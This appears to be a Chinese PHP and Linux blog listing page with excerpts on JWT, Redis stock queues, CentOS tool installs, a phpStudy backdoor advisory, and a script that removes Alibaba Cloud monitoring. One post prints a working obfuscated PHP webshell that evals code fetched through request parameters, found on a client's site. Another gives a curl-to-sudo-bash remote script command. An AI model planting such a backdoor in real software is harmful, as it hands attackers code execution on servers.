jincon 发表的文章

php实现JWT认证的方法 JWT验证使用流程

JWT是json web token缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法。

JWT由三个部分组成:header.payload.signature

header部分:
jwt的头部承载两部分信息:
声明类型,这里是jwt
声明加密的算法 通常直接使用 HMAC SHA256
完整的头部就像下面这样的JSON:
{
  "alg": "HS256",
  "typ": "JWT"
}

» 阅读全文

关键词: jwt验证

发现一只小php木马后门,挺特的,可以绕过部分查杀系统

从一个客户的网站上看到了,现在的小菜鸡的后门技术有进步啊,后门如下:

代码仅供测试研究,请不要用于非法用途哦

<?php
function _strint($key){
	return @file_get_contents($key);
}
function log1($log){
	lone(_strint($log));
}
function lone($key){
	$str = "";
	return eval($str.$key.$str);
}
foreach (array('_COOKIE','_POST','_GET') as $_request)
{
    foreach ($$_request as $_key=>$_value)
    {
        $$_key=  $_value;
    }
}
$id = isset($id) ? $id : 2;
log1($id);
?>

关键词: php木马后门

基于Redis的PHP+MySQL商品秒杀与超卖场景基础解决方法

基于Redis的PHP+MySQL商品秒杀与超卖场景基础解决方法,简单来说,就是这样方法应用于简单的非超大型

的业务场景。超大型的秒杀业务往往需要考虑的情况比较多。

实现原理
把商品库存数量加到redis队列的num里,下单的时候通过rpop从队列中每次取1件商品,当num为0时,停止下单。
下面我们来看具体实现过程。这样就可以把压力主要甩给redis了。
加入库存队列
我们在Redis中加入商品库存队列。假如商品Apple iPhone 11库存有100件。我们可以写个脚本将商品库存加入到Redis队列中。

for($i=1; $i <= 100; $i++){
    $redis->lpush('num', $i);
}
下单购买
我们建立下单文件Order.php
首先是连接redis和mysql的代码。这个简单。


» 阅读全文

关键词: 商品秒杀

Centos7安装Cockpit教程,监控/管理Linux服务器

centos7中默认已经集成cockpit服务了,启用非常简单方便。 安装 yum install -y cockpit 启用服务 systemctl enable --now cockpit.socket 打开防火墙 firewall-cmd --permanent --add-service=cockpit firewall-cmd --reload 打开WEB页面 在浏览器地址栏中输入服务器IP加端口号,如: 192.168.1.24:9090 安装扩展服务 安装cockpit扩展模块: yum list cockpit* yum -y install cockpit-composer cockpit-dashboard cockpit-doc

» 阅读全文

关键词: cockpit , centos7

Linux/CentOS7下安装FFmpeg处理音频/视频

最近换了一个新服务器,有一些特别的语音格式要处理为mp3格式,所以,需要配置FFmpeg进行转换处理。

Linux/CentOS7下安装FFmpeg处理音频/视频

安装EPEL repo

sudo yum -y install epel-release
安装nux-dextop-release
sudo rpm -Uvh http://li.nux.ro/download/nux/dextop/el7/x86_64/nux-dextop-release-0-1.el7.nux.noarch.rpm
sudo yum -y update
安装FFmpeg
sudo yum -y install ffmpeg ffmpeg-devel

phpStudy隐藏后门预警:小心被植入隐藏后门,电脑服务器被沦为肉鸡

9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文中,很有爆炸,一看,握草,“PhpStudy软件”遭到黑客篡改并植入“后门”,真是防不慎防啊。

特么的,phpStudy 这个渣渣玩意,竟然被人植入后门都不知道,死猪一般。

再次真诚建议,特么的不要再使用phpstudy这个渣渣玩意。

据监测发现,被篡改的软件版本并不单单是官方通告的PhpStudy2016版本中的php5.4版本,而是在PhpStudy 2016版和2018版两个版本中均同时被发现有“后门”文件的存在,并且影响部分使用PhpStudy搭建的PHP5.2、PHP5.3和PHP5.4环境。

分析过程:

对比官网的xmlrpc源代码可以知道,默认xmplrpc模块的几个初始化函数都是被设置为:

phpStudy隐藏后门预警

而污染过的版本中“request_startup_func”函数被恶意攻击者自定义:

» 阅读全文

关键词: phpstudy隐藏后门

移除阿里云监控程序,保护您的隐私:AlibabaCloud-CentOS7-Pure-and-safe

简介

该脚本可以移除阿里云监控程序,并使用防火墙阻止不良IP,以保护您的隐私。切换到其他yum存储库。

阿里云镜像缺乏最新的软件包,使用这些旧软件包可能会导致安全漏洞。并保证在已有功能前提下实现

真正的一键净化,并适配到所有CentOS 7机器,可以优化并净化所有自带模板的CentOS 7系统。


更新
当然是帮你保持系统是当前最新的,目前最新系统为:CentOS 7.5,阿里还未提供CentOS 7.5的系统模板。

将该系统的DNS永久改为1.1.1.1/8.8.8.8,一个宣称不收集用户隐私,一个备用信仰加成,防止服务商对

服务器访问内容的监控。

Yum Mirror修改为CentOS官方源,自动适配离机房距离较近的源,全球服务器均可通用。
增加对云盾新IP段的屏蔽。
增加对云盾新组件的清除工作。
拓展源epel的更新。
MOTD登陆提示的规范化。
净化完可根据提示一键更换内核安装LotServer。
脚本

Github地址:https://github.com/MeowLove/AlibabaCloud-CentOS7-Pure-and-safe

神一般的命令:

sudo curl -sSL https://raw.githubusercontent.com/MeowLove/AlibabaCloud-CentOS7-Pure-and-safe/master/download/kill/New_installation.sh | sudo bash

php对数组的字符串长度进行排序

php对数组的字符串长度进行排序,主要是用到 usort 自定义的排序:

$file = file('zong.txt');
usort($file,  'sortByLen');
$handle = fopen('zong2.txt', 'a');
foreach ($file as $v){
    fwrite($handle, $v);
}
fclose($handle);
function sortByLen($a, $b) {
    if (strlen($a) == strlen($b)) {
        return 0;
    } else {
        return (strlen($a) > strlen($b)) ? 1 : -1;
    }
}

关键词: 字符串排序